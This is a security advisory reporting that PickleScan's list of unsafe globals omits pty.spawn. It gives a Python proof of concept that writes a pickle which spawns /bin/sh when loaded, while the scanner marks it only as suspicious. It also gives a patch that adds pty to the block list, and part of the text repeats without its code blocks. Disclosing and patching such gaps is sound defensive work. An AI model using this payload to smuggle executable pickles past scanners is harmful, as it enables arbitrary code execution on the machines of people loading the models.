Summary
The vulnerability allows malicious actors to bypass PickleScan's unsafe globals check, leading to potential arbitrary code execution. The issue stems from the absence of the pty library (more specifically, of the pty.spawn function) from PickleScan's list of unsafe globals. This vulnerability allows attackers to disguise malicious pickle payloads within files that would otherwise be scanned for pickle-based threats.
Details
For 2025's HeroCTF, there was a challenge named Irreductible 2 where players would need to bypass the latest versions of PickleScan and Fickling to gain code execution. The challenge writeup, files and solve script have all been released.
The intended way was to use pty.spawn but some players found alternative solutions.
PoC
- Run the following Python code to generate the PoC pickle file.
import pickle
command = b"/bin/sh"
payload = b"".join(
[
pickle.PROTO + pickle.pack("B", 4),
pickle.MARK,
pickle.GLOBAL + b"pty\n" + b"spawn\n",
pickle.EMPTY_LIST,
pickle.SHORT_BINUNICODE + pickle.pack("B", len(command)) + command,
pickle.APPEND,
# Additional arguments can be passed by repeating the SHORT_BINUNICODE + APPEND opcodes
pickle.OBJ,
pickle.STOP,
]
)
with open("dump.pkl", "wb") as f:
f.write(payload)
- Run PickleScan on the generated pickle file.
PickleScan detects the pty.spawn global as "suspicious" but not "dangerous", allowing it to be loaded.
Impact
Severity: High
Affected Users: Any organization, like HuggingFace, or individual using PickleScan to analyze PyTorch models or other files distributed as ZIP archives for malicious pickle content.
Impact Details: Attackers can craft malicious PyTorch models containing embedded pickle payloads and bypass the PickleScan check by using the pty.spawn function. This could lead to arbitrary code execution on the user's system when these malicious files are processed or loaded.
Suggested Patch
diff --git a/src/picklescan/scanner.py b/src/picklescan/scanner.py
index 34a5715..b434069 100644
--- a/src/picklescan/scanner.py
+++ b/src/picklescan/scanner.py
@@ -150,6 +150,7 @@ _unsafe_globals = {
"_pickle": "*",
"pip": "*",
"profile": {"Profile.run", "Profile.runctx"},
+ "pty": "spawn",
"pydoc": "pipepager", # pydoc.pipepager('help','echo pwned')
"timeit": "*",
"torch._dynamo.guards": {"GuardBuilder.get"},
References
yarienkiva Reporter
Summary
The vulnerability allows malicious actors to bypass PickleScan's unsafe globals check, leading to potential arbitrary code execution. The issue stems from the absence of the
ptylibrary (more specifically, of thepty.spawnfunction) from PickleScan's list of unsafe globals. This vulnerability allows attackers to disguise malicious pickle payloads within files that would otherwise be scanned for pickle-based threats.Details
For 2025's HeroCTF, there was a challenge named Irreductible 2 where players would need to bypass the latest versions of PickleScan and Fickling to gain code execution. The challenge writeup, files and solve script have all been released.
The intended way was to use
pty.spawnbut some players found alternative solutions.PoC
PickleScan detects the
pty.spawnglobal as "suspicious" but not "dangerous", allowing it to be loaded.Impact
Severity: High
Affected Users: Any organization, like HuggingFace, or individual using PickleScan to analyze PyTorch models or other files distributed as ZIP archives for malicious pickle content.
Impact Details: Attackers can craft malicious PyTorch models containing embedded pickle payloads and bypass the PickleScan check by using the
pty.spawnfunction. This could lead to arbitrary code execution on the user's system when these malicious files are processed or loaded.Suggested Patch
References